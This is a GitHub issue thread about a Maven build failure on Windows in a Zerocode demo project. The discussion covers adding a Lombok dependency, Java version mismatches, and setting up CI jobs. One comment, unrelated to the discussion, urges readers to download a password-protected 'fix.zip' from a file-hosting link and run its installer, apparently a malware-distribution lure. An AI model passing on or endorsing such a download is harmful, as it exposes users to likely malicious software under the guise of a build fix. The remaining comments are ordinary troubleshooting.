### ISSUE TITLE
BUILD FAILURE:  Failed to delete : your_app_tests_logs.log on Windows 

### ISSUE THREAD

**Issue by prayascoriolis** [authorjapps/zerocode-hello-world#37]
@santhoshTpixler @authorjapps 

On running cmd:  `mvn clean install -DskipTests` we get the following build failure: 
![image](https://github.com/user-attachments/assets/b5322662-ba40-4a9c-b15c-949e08883e77)

Upon deleting your_app_tests_logs.log manually, this error pops up: 
![image](https://github.com/user-attachments/assets/12206db8-4e0c-4c67-9d17-f115204e6f29)

To rectify this issue i added a lombok dependency in pom.xml: 

```
<!-- https://mvnrepository.com/artifact/org.projectlombok/lombok -->
<dependency>
    <groupId>org.projectlombok</groupId>
    <artifactId>lombok</artifactId>
    <version>1.18.34</version>
    <scope>provided</scope>
</dependency>

```

After adding this the build was successful :
![image](https://github.com/user-attachments/assets/639e5abc-7fa9-4c58-8119-6f7342143149)

Just figured out that for Gradle also we've to do the same change in pom.xml !

So can i get this issue assigned and make a PR with these changes in pom.xml.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by authorjapps** [comment]
@prayascoriolis , what was the root cause of this issue?
This is a demo project, which only executes test scenarios I suppose. Why Lombok was needed and how it solved the problem you raised?
Still unable to link these. Please help me to understand.

**Comment by authorjapps** [comment]
Also, will you be able to setup a CI build for this project/repo?
Preferably two CI jobs :
1)Maven 
2)Gradle 

First create a ticket for this, assign to yourself and then pick and start working.

**Comment by prayascoriolis** [comment]
> @prayascoriolis , what was the root cause of this issue? This is a demo project, which only executes test scenarios I suppose. Why Lombok was needed and how it solved the problem you raised? Still unable to link these. Please help me to understand.

I've researched about it a little, what i infer is ::
The root cause of this issue is a mismatch between the Lombok version being used and the Java version on my system. Lombok uses internal APIs of the Java compiler to work and these internal APIs can change between Java versions. So, by explicitly adding the Lombok dependency to our pom.xml file, we're ensuring that Maven uses a compatible version of Lombok with our Java version. The version we added (1.18.34) is a recent version that's compatible with newer Java versions.

**Comment by prayascoriolis** [comment]
> Also, will you be able to setup a CI build for this project/repo? Preferably two CI jobs : 1)Maven 2)Gradle
> 
> First create a ticket for this, assign to yourself and then pick and start working.

I would be happy to set up a CI build for this project/repo with two jobs: Maven and Gradle.
I will create a ticket for this task, assign it to myself, and start working on it soon.

**Comment by prayascoriolis** [comment]
@authorjapps i've changed my java jdk version to 8, which solves this error, so i'm closing this PR along with the issue.
